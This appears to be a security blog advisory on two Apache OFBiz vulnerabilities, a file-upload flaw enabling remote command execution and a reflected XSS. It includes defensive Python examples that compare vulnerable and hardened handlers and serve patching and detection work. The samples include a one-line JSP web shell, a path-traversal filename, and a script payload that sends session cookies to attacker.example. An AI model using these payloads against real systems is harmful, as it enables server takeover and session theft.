
Critical Apache OFBiz Flaw (CVE-2025-59118) Enables Remote Command Execution through Unrestricted File Upload

  • Nov 12, 2025

Key Findings


  • Newly disclosed vulnerabilities in Apache OFBiz, an open-source ERP platform

  • CVE-2025-59118: Unrestricted File Upload vulnerability allowing remote command execution (RCE)

  • CVE-2025-61623: Reflected cross-site scripting (XSS) vulnerability


Background


Apache OFBiz is an open-source enterprise resource planning (ERP) software used for managing critical business workflows, including accounting, e-commerce, and inventory management. As a widely adopted ERP platform, vulnerabilities in OFBiz can have significant impact on organizations that rely on it.


CVE-2025-59118: Unrestricted File Upload Vulnerability


  • Classified as an "Unrestricted Upload of File with Dangerous Type" vulnerability

  • Allows remote attackers to upload arbitrary files, such as malicious scripts, without proper validation or sanitization

  • Enables remote command execution (RCE) under the context of the running service

  • Code runs with the privileges of the account the OFBiz service runs under; from there an attacker can execute arbitrary commands, deploy a web shell, or pivot deeper into the network. Running OFBiz as an unprivileged user limits, but does not remove, that impact
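The following is an added example, not code from Apache OFBiz or from the advisory: it contrasts an upload handler that trusts the client-supplied filename and content-type (the "Unrestricted Upload of File with Dangerous Type" pattern) with a hardened one that enforces an extension allowlist, checks the file's leading bytes against that extension, rejects path components and double extensions, and stores under a server-chosen name outside the webroot. The sample uploads, the paths `/srv/app/webapps` and `/srv/app/uploads`, and both handlers are constructed for illustration; the handlers return the destination path rather than writing to disk so the example runs offline.

```python
import os
import re
import secrets

# Constructed sample uploads: (client filename, client content-type, leading bytes).
# Note the web shell declared as image/png and the JPEG bytes under a .PNG name.
SAMPLE_UPLOADS = [
    ("report.pdf", "application/pdf", b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n"),
    ("shell.jsp", "image/png", b'<% Runtime.getRuntime().exec(request.getParameter("c")); %>'),
    ("../../webapps/ROOT/x.jsp", "application/octet-stream", b"<% %>"),
    ("logo.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    ("logo.png.jsp", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    ("photo.PNG", "image/jpeg", b"\xff\xd8\xff\xe0" + b"\x00" * 16),
]

WEBROOT = "/srv/app/webapps"    # hypothetical path served by the application container
UPLOAD_DIR = "/srv/app/uploads"  # hypothetical path outside the webroot, never served as code


def vulnerable_store(filename, content_type, data):
    """Unrestricted upload: the client's filename decides both the name and the extension,
    nothing checks the bytes, and the file lands under the webroot. A traversal sequence
    escapes WEBROOT and a .jsp becomes executable the moment it is requested."""
    return os.path.normpath(os.path.join(WEBROOT, filename))


# Allowlist: lowercase extension -> magic prefix the content must start with.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "pdf": b"%PDF-",
}


def validate_upload(filename, data):
    """Return the accepted extension or raise ValueError.
    The client's Content-Type header is deliberately ignored: it is attacker-controlled."""
    base = os.path.basename(filename.replace("\\", "/"))
    if base != filename or base in ("", ".", ".."):
        raise ValueError("path components in filename")
    parts = base.lower().split(".")
    # Exactly one dot: rejects 'logo.png.jsp' and names with no extension at all.
    if len(parts) != 2 or not re.fullmatch(r"[a-z0-9_-]{1,64}", parts[0]):
        raise ValueError("unexpected filename shape")
    ext = parts[1]
    magic = ALLOWED.get(ext)
    if magic is None:
        raise ValueError(f"extension not allowed: {ext}")
    if not data.startswith(magic):
        raise ValueError("content does not match extension")
    return ext


def hardened_store(filename, content_type, data):
    """Validate, then store under a random server-chosen name outside the webroot."""
    ext = validate_upload(filename, data)
    return os.path.join(UPLOAD_DIR, f"{secrets.token_hex(16)}.{ext}")


def triage(uploads=SAMPLE_UPLOADS):
    """Run both handlers over the samples: (filename, path the vulnerable handler would
    write to, verdict from the hardened handler)."""
    out = []
    for name, ctype, data in uploads:
        try:
            hardened_store(name, ctype, data)
            verdict = "accepted"
        except ValueError as exc:
            verdict = f"rejected: {exc}"
        out.append((name, vulnerable_store(name, ctype, data), verdict))
    return out


if __name__ == "__main__":
    for name, vuln_path, verdict in triage():
        print(f"{name!r:30} vulnerable -> {vuln_path:40} hardened -> {verdict}")
```

The magic-byte check is not a substitute for the extension allowlist (polyglot files exist); the two checks together, plus storing outside the webroot under a name the client never chose, are what keep an uploaded file from ever being interpreted as server-side code.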


CVE-2025-61623: Reflected Cross-Site Scripting (XSS) Vulnerability


  • Allows attackers to inject malicious JavaScript into the browser of unsuspecting users via manipulated URLs or crafted input parameters

  • Can be used to steal session cookies that are not marked HttpOnly, impersonate users, or perform actions in OFBiz's web management console with the victim's privileges

  • Poses a significant threat in multi-user administrative environments, especially when combined with social engineering or phishing campaigns
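As an added example, not code from OFBiz or the advisory: a reflected XSS sink beside its fix. The handler takes a query parameter from a crafted link of the kind a phishing mail would carry, the vulnerable version interpolates it straight into HTML, the hardened version entity-encodes it for the HTML context, and a scanner-style check confirms whether the raw payload comes back verbatim. The URL, the `/control/search` path, the `q` parameter and the `JSESSIONID` cookie name are assumptions made for the illustration.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed crafted link (hypothetical host and path). Decoded, q is:
#   <script>fetch('https://attacker.example/?'+document.cookie)</script>
CRAFTED_URL = (
    "https://ofbiz.example/control/search?q=%3Cscript%3Efetch(%27https://attacker.example/"
    "%3F%27%2Bdocument.cookie)%3C/script%3E"
)


def query_param(url, name):
    """Decode one query parameter the way a servlet container would hand it to the app."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get(name, [""])[0]


def vulnerable_render(q):
    """Reflects the parameter unchanged: markup in q becomes markup in the page."""
    return f"<p>Results for: {q}</p>"


def hardened_render(q):
    """Entity-encodes for the HTML text context; quote=True also covers attribute values."""
    return f"<p>Results for: {html.escape(q, quote=True)}</p>"


def is_reflected_unescaped(q, page):
    """The check a scanner makes: does the raw value appear verbatim in the response?"""
    return q in page and q != html.escape(q, quote=True)


def session_cookie_header(value):
    """Defence in depth for the cookie-theft case: HttpOnly keeps document.cookie from
    exposing the session even when a script does run. It does not stop an injected
    script from issuing requests as the victim, so output encoding is still required."""
    return f"Set-Cookie: JSESSIONID={value}; Path=/; Secure; HttpOnly; SameSite=Lax"


def demo(url=CRAFTED_URL):
    q = query_param(url, "q")
    vuln = vulnerable_render(q)
    safe = hardened_render(q)
    return {
        "param": q,
        "vulnerable": vuln,
        "hardened": safe,
        "vuln_reflects": is_reflected_unescaped(q, vuln),
        "hardened_reflects": is_reflected_unescaped(q, safe),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Encoding must match the output context: `html.escape` is right for HTML text and quoted attributes, but a value placed inside a `<script>` block, a URL, or an inline event handler needs the encoding for that context instead.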


Mitigation and Recommendations


  • The Apache Software Foundation (ASF) has released version 24.09.03, which fixes both vulnerabilities

  • ASF strongly urges immediate upgrades to mitigate the risk of exploitation

  • Organizations using Apache OFBiz should prioritize applying the security update to protect their critical business systems and data

  • Where the upgrade cannot be applied immediately, limit who can reach the OFBiz web console and check the deployment for unexpected, recently written server-side script files, a common indicator of a web shell dropped through an upload flaw


Sources


  • https://securityonline.info/critical-apache-ofbiz-flaw-cve-2025-59118-allows-remote-command-execution-via-unrestricted-file-upload/

  • https://securityonline.info/critical-synology-beestation-zero-day-cve-2025-12686-found-at-pwn2own-allows-remote-code-execution/

© 2025 by Explain IT Again. Powered and secured by Wix